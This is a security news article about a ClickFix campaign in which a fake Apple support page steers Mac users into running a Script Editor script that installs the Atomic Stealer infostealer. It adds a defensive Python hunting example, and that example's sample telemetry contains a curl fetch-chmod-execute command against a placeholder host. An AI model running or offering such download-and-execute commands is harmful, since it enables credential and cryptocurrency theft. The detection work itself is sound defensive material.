Fake Apple Page Spreads Mac Malware via ClickFix

▼ Summary
– Security researchers discovered a new ClickFix-style attack that tricks Mac users via a fake Apple support page offering bogus disk-space cleanup instructions.
– This social engineering technique, which convinces victims to run malicious commands, has expanded from targeting Windows to also include macOS and Linux users.
– Attackers now use a browser method to launch Script Editor with a malicious script, bypassing newer macOS Terminal security features.
– If executed, the script secretly downloads Atomic Stealer malware, which steals passwords, financial data, and cryptocurrency information.
– Atomic Stealer is sold as a subscription to criminals and can harvest data from Keychain, browsers, and wallets.
A new social engineering campaign is targeting Mac users through a deceptive website posing as an official Apple support page. Security analysts at Jamf recently identified this threat, which uses a ClickFix-style attack to trick individuals into executing malicious scripts. The fraudulent page advertises help for users wanting to reclaim disk space on their Mac, a common concern that lends credibility to the scam.
The ClickFix technique is a form of manipulation where attackers convince victims to run harmful commands themselves, often by framing them as necessary fixes or maintenance steps. While this method initially focused on Windows systems, it has expanded to include macOS and Linux users. For years, the standard approach on Macs involved getting users to paste malicious commands directly into the Terminal application. Apple addressed this specific vector in macOS 26.4 by introducing a security feature that scans commands pasted into Terminal before execution.
In response, threat actors have adapted. They now use a browser-triggered workflow that launches Apple’s Script Editor instead of Terminal. Both applications ship with macOS, but the new paste check applies only to Terminal, so moving the payload into Script Editor sidesteps it. The attack unfolds in a series of steps designed to look legitimate: the user visits the malicious site and follows its instructions, which include clicking an “Execute” button. That click triggers a prompt asking for permission to open Script Editor, and once the application opens it is already populated with the attackers’ script.
Depending on the macOS version, the user may also see a warning about running the script. If that warning is ignored and the script is saved and executed, it quietly downloads and runs a variant of Atomic Stealer, also known as AMOS. AMOS is sold by subscription on criminal forums as malware-as-a-service, so buyers can deploy it for data theft without writing their own tooling. Its capabilities are extensive: it harvests system information, steals credentials from the macOS Keychain, and extracts autofill data, saved passwords, cookies, and credit card details from web browsers. It also targets cryptocurrency wallets and other sensitive data.
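As an added example (not from the article, and not Jamf’s detection logic or indicators), the following Python hunt walks a process tree and flags download tools that run underneath Script Editor or osascript, which is the chain the steps above describe: a pasted script runs inside Script Editor and fetches a payload. The telemetry records, field names, domain and command lines are constructed for illustration, and the set of downloader names is an assumption, since the article does not say how the script fetches AMOS.

```python
# Added example: an illustrative hunting heuristic for the chain the article
# describes (Script Editor runs a pasted script, which downloads a payload).
# This is not Jamf's detection logic and uses none of their IOCs. The event
# format, field names, process names and command lines below are constructed.

SCRIPT_HOSTS = {"Script Editor", "osascript"}   # where a pasted AppleScript runs
DOWNLOADERS = {"curl", "wget"}                  # assumption: payload fetched by a CLI tool

def build_tree(events):
    """Index events by pid so ancestry can be walked cheaply."""
    return {e["pid"]: e for e in events}

def ancestry(tree, pid):
    """Process names from pid up to the root, e.g. ['curl', 'sh', ..., 'launchd']."""
    names, seen = [], set()
    while pid in tree and pid not in seen:   # 'seen' guards against bad ppid loops
        seen.add(pid)
        names.append(tree[pid]["name"])
        pid = tree[pid]["ppid"]
    return names

def find_script_editor_downloads(events):
    """Return one alert per downloader whose ancestry includes a script host.

    An app opened via a URL scheme is launched by launchd on the browser's
    behalf, so the browser is NOT the parent of Script Editor. Keying on the
    descendants of Script Editor/osascript avoids relying on that link.
    """
    tree = build_tree(events)
    alerts = []
    for ev in events:
        if ev["name"] not in DOWNLOADERS:
            continue
        chain = ancestry(tree, ev["pid"])
        if SCRIPT_HOSTS & set(chain):
            alerts.append({"pid": ev["pid"], "chain": " <- ".join(chain), "cmd": ev["cmd"]})
    return alerts

# Constructed sample telemetry (not real data): one malicious chain, one benign.
SAMPLE_EVENTS = [
    {"pid": 1,   "ppid": 0,   "name": "launchd",       "cmd": "/sbin/launchd"},
    # Script Editor opened from the browser prompt; launchd is its parent
    {"pid": 410, "ppid": 1,   "name": "Script Editor", "cmd": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"},
    # the saved script's `do shell script` runs /bin/sh, which fetches and runs a payload
    {"pid": 411, "ppid": 410, "name": "sh",            "cmd": "sh -c 'curl -s https://cleanup.example/p -o /tmp/p && chmod +x /tmp/p && /tmp/p'"},
    {"pid": 412, "ppid": 411, "name": "curl",          "cmd": "curl -s https://cleanup.example/p -o /tmp/p"},
    # benign: a developer's Terminal session also runs curl
    {"pid": 520, "ppid": 1,   "name": "Terminal",      "cmd": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 521, "ppid": 520, "name": "zsh",           "cmd": "-zsh"},
    {"pid": 522, "ppid": 521, "name": "curl",          "cmd": "curl -I https://example.org/"},
]

if __name__ == "__main__":
    for a in find_script_editor_downloads(SAMPLE_EVENTS):
        print(f"pid {a['pid']}: {a['chain']}\n  {a['cmd']}")
```

On a real fleet the event list would come from an EDR or Endpoint Security process feed rather than an inline list, and the downloader set would be broadened to whatever the saved script actually invokes. The benign Terminal chain is included deliberately: the Terminal paste check the article mentions does nothing for scripts run from Script Editor, so the hunt keys on the script host in the ancestry, not on the shell or the download tool alone.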
Jamf has published relevant indicators of compromise to help organizations and individuals detect this ongoing campaign. This incident underscores the evolving nature of social engineering threats, where attackers continuously modify their methods to circumvent security improvements. Users should remain skeptical of unsolicited instructions from websites, especially those prompting the execution of scripts, even if they appear to originate from trusted brands like Apple.
(Source: Help Net Security)